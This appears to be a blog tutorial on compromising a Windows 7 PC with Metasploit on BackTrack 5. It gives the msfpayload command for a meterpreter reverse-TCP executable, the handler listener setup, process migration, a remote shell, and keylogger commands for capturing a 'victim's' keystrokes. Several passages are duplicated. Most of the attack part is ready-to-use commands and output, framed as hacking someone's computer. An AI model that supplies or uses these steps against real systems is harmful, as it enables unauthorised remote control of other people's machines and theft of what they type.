Hello friends, Today I'll teach you you can exploit Windows 7 PC by using metasploit on BackTrack 5.
What is BackTrack?
BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking.
Regardless if you’re making BackTrack you Install BackTrack, boot it from a Live DVD or thumbdrive, the penetration distribution has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.
BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking.
Regardless if you’re making BackTrack you Install BackTrack, boot it from a Live DVD or thumbdrive, the penetration distribution has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.
How to Exploit?Let's start exploiting windows 7 Pc using metasploit framework.
What is MetaSploit?
MetaSploit is a world's most used penetration testing software.
Okay, Now Start your BackTrack 5 and type startx to enter into GUI mode.
root@Way2Computerworld:~#startx
By default the username and password is
Username: root
Pass: toor
To know your Local Ip. Open up a the Terminal (on the bottom left of taskbar) and type in:
root@Way2Computerworld:~#ifconfig
Launch msfconsole by going to Applications>>Backtrack>>Exploitation Tools>>Network Exploitation Tools>>Metasploit Framework>>msfconsole
Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.
Open another shell window and type in : cd -P /opt/framework3/msf3
Open another shell window and type in : cd -P /opt/framework3/msf3
root@Way2Computerworld:/opt/framework3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=anyportno x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier and for port you could select anything.You will get like this:
Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.
Now open the 1st shell window with msfconsole in it.
msf >
Type the following:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST xxx.xxx.xxx.xxx
LHOST => xxx.xxx.xxx.xxx
msf exploit(handler) > set LPORT 4444
LPORT => 4444
All the connections are done. You have already made an executable file which makes a reverse connection to you.
And now, you have set the meterpreter to listen to you on port 4444.
The last step you have to do now, is to type in “exploit” and press enter,
msf exploit(handler) > exploit
You would see a meterpreter prompt like this
meterpreter >
Type in ps to list the active processes
meterpreter > ps
Search for explorer.exe and migrate to the process
meterpreter >
Type in ps to list the active processes
meterpreter > ps
Search for explorer.exe and migrate to the process
meterpreter > migrate 2028
[*] Migrating to 2028…
[*] Migration completed successfully.
meterpreter >
[*] Migrating to 2028…
[*] Migration completed successfully.
meterpreter >
Type in the following:
meterpreter > use priv
meterpreter > use priv
Now, if you want to start the Keylogger activity on victim, just type keyscan_start
Now, if you want to go to the victim’s computer,
Jus type shell
meterpreter > shell
Process 844 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
You would now be having a command prompt,
Type in whoami, to see the computer’s name of victim :
C:\Windows\system32>whoami
whoami
Way2Computerworld-pc\hacker
C:\Windows\system32
Let’s suppose you want to start a notepad on the victim’s computer.
Type in: notepad.exe
Let’s say the victim has typed in anything on his computer.
Just type exit, to return to meterpreter.
Now type in keyscan_dump, to see all the typed keystrokes :
meterpreter > keyscan_dump
Dumping captured keystrokes…
You Are Done!
Hope you liked my post. Share with your friends...
